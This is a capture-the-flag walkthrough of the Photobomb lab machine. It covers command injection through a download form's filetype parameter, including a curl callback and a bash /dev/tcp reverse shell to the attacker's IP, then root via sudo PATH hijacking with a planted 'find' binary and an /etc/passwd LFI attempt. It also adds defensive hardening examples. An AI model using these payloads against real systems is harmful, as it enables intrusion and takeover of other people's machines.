Hi everyone! This write-up covers an easy Linux machine that focuses on enumerating the web page's source for a backdoor login, using a command injection vulnerability for initial access, and PATH hijacking via sudo for root. Let's get started!
1. Nmap enumeration
$ IP=10.10.11.182
$ sudo nmap -sC -sV -p- $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Based on the nmap result (the HTTP redirect that was not followed), we can see that the domain name is "photobomb.htb".
2. Web enumeration
Firstly, we should add the domain name into the hosts file.
$ sudo nano /etc/hosts
In /etc/hosts:
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.182 photobomb.htb
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Remember to replace the IP address with the one assigned to your target instance. Once the entry is saved, we can visit the website in our browser.

If we click on “click here”, we will be prompted with a login pop-up.
2.1 Login backdoor
When looking at the main page's source code, I went into photobomb.js and noticed a backdoor login URL, left there for tech support in case they forget the login credentials.

Using that login URL, we can log in to the dashboard.

2.2 Command injection via a web request parameter
To confirm the injection, we first need an HTTP server we control. Host one with Python:
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Using Burp Suite, intercept the POST request that is sent when we attempt to download a photo. Inject a command into the filetype parameter that curls back to our HTTP server, then forward the request. Remember to change the IP to your own machine's IP address, and URL-encode the payload. Our HTTP server should then receive an incoming connection from the victim.
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | curl http://10.10.16.18&dimensions=3000x2000
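Since the injected `| curl` executed, the filetype value clearly reaches a shell unvalidated. Here, as an added example that is not the box's application code, is how the handler's three parameters would be validated on the server side before any command is built; `resize-tool` is a hypothetical stand-in for whatever image tool the app actually runs, and the photo-name check mirrors the one section 4.1 reports.

```shell
#!/bin/sh
# Added example: validate the download form's parameters with allowlists,
# then build an argv instead of a shell string. None of this is the box's code.

# Allowlist the extension. A case pattern must match the whole string, so
# 'jpg | curl http://10.10.16.18' (the payload above) cannot match 'jpg'.
validate_filetype() {
    case "$1" in
        jpg|png) return 0 ;;
        *)       return 1 ;;
    esac
}

# WIDTHxHEIGHT, digits only; any shell metacharacter fails the match.
validate_dimensions() {
    printf '%s\n' "$1" | grep -Eq '^[1-9][0-9]{0,4}x[1-9][0-9]{0,4}$'
}

# Build the command from validated parts only, never via 'sh -c "$string"'.
# Prints the argv one element per line so a caller can see that no
# word-splitting or operator parsing took place.
build_resize_argv() {
    photo=$1 filetype=$2 dimensions=$3
    validate_filetype "$filetype"     || { echo "bad filetype" >&2; return 1; }
    validate_dimensions "$dimensions" || { echo "bad dimensions" >&2; return 1; }
    case "$photo" in
        */*|*..*|'') echo "bad photo name" >&2; return 1 ;;  # reject / and .. like the app's own check
    esac
    # resize-tool is a hypothetical stand-in; each value stays a single argv entry.
    printf '%s\n' resize-tool "source_images/$photo" -resize "$dimensions" "out.$filetype"
}
```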


2.3 Reverse shell
We can now get a reverse shell. First, start a netcat listener.
nc -lvnp 443
Next, use Burp Suite again to inject a bash reverse shell through the same parameter, pointing it at our netcat listener. Remember to URL-encode it.
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'&dimensions=3000x2000

Our netcat listener should receive the reverse shell. We can then upgrade it to a TTY with Python's pty module.
$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.182] 57482
bash: cannot set terminal process group (736): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
wizard@photobomb:~/photobomb$
2.4 Get the user flag
wizard@photobomb:~/photobomb$ cd ~
cd ~
wizard@photobomb:~$ ls
ls
photobomb  user.txt
wizard@photobomb:~$ cat user.txt
cat user.txt
b5******************************
wizard@photobomb:~$
3. Privilege escalation
3.1 Sudo privilege
wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
We can see that our current user may run /opt/cleanup.sh as root without a password, and the SETENV tag lets us set environment variables (including PATH, overriding secure_path) on the sudo command line for that script.
3.2 Path hijacking
I first checked whether the user has write permission to the script. It doesn't, so I printed its contents and noticed that it is vulnerable to PATH hijacking: find is invoked by its bare name rather than an absolute path.
wizard@photobomb:~$ ls -l /opt/cleanup.sh
ls -l /opt/cleanup.sh
-r-xr-xr-x 1 root root 340 Sep 15 12:11 /opt/cleanup.sh
wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
I decided to hijack the find command by creating a file named find in the current user's home directory that spawns a shell. Since the script runs as root, the shell it spawns has root privileges. After making the file executable, I ran the script with sudo while setting PATH so that the home directory is searched first for commands. As a result, this spawned a root shell.
wizard@photobomb:~$ echo "/bin/bash -p" > find
echo "/bin/bash -p" > find
wizard@photobomb:~$ chmod 777 find
chmod 777 find
wizard@photobomb:~$ pwd
pwd
/home/wizard
wizard@photobomb:~$ sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb#
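The fix on the defender's side has two parts, shown here as an added example that is not the box's /opt/cleanup.sh: pin PATH at the top of the script and call every external tool by absolute path, so a PATH supplied through sudo SETENV is never consulted. The application directory and owner are parameters only so the script can be exercised without root (the box hard-codes /home/wizard/photobomb and root:root).

```shell
#!/bin/sh
# Added example: hardened rewrite of the cleanup script's pattern.
# Not the box's file; directory and owner are parameters for testability.

# Pin PATH before anything else runs. Whatever PATH the caller handed us
# (sudo SETENV lets an unprivileged user choose it) is discarded.
pin_path() {
    PATH=/usr/sbin:/usr/bin:/sbin:/bin
    export PATH
}

# Report which binary a bare command name resolves to once PATH is pinned.
pinned_lookup() {
    pin_path
    command -v "$1"
}

# $1 = application directory, $2 = owner to give the originals (root:root on the box).
hardened_cleanup() {
    pin_path
    cd "$1" || return 1

    # clean up log files
    if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]; then
        /bin/cat log/photobomb.log > log/photobomb.log.old
        /usr/bin/truncate -s0 log/photobomb.log
    fi

    # protect the originals: find and chown are now called by absolute path,
    # so a file named "find" earlier in PATH is never looked up.
    /usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown "$2" {} \;
}
```

Removing the SETENV tag from the sudoers entry closes the same hole from the other side, since secure_path then applies unconditionally.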
3.3 Getting the root flag
root@photobomb:/home/wizard/photobomb# cd ~
cd ~
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
ae******************************
4. Additional stuff
This section contains things that did not help us get the flag, but are worth recording so you know which methods are dead ends.
4.1 Local File Inclusion (LFI) not possible
Similarly, using Burp Suite, I tried the photo parameter with a double-URL-encoded LFI path to the passwd file followed by a null byte (from the HackTricks cheat sheet).
photo=%252e%252e%252fetc%252fpasswd%00&filetype=jpg&dimensions=3000x2000

The server responds with an error page. Expanding the first row of the trace shows the partial source code that validates the filename: it rejects a forward slash (/) and double dots (..) to prevent path traversal. With those checks in place there is no way to bypass it, which means LFI is a rabbit hole.

I hope this write-up has been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more content like this. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂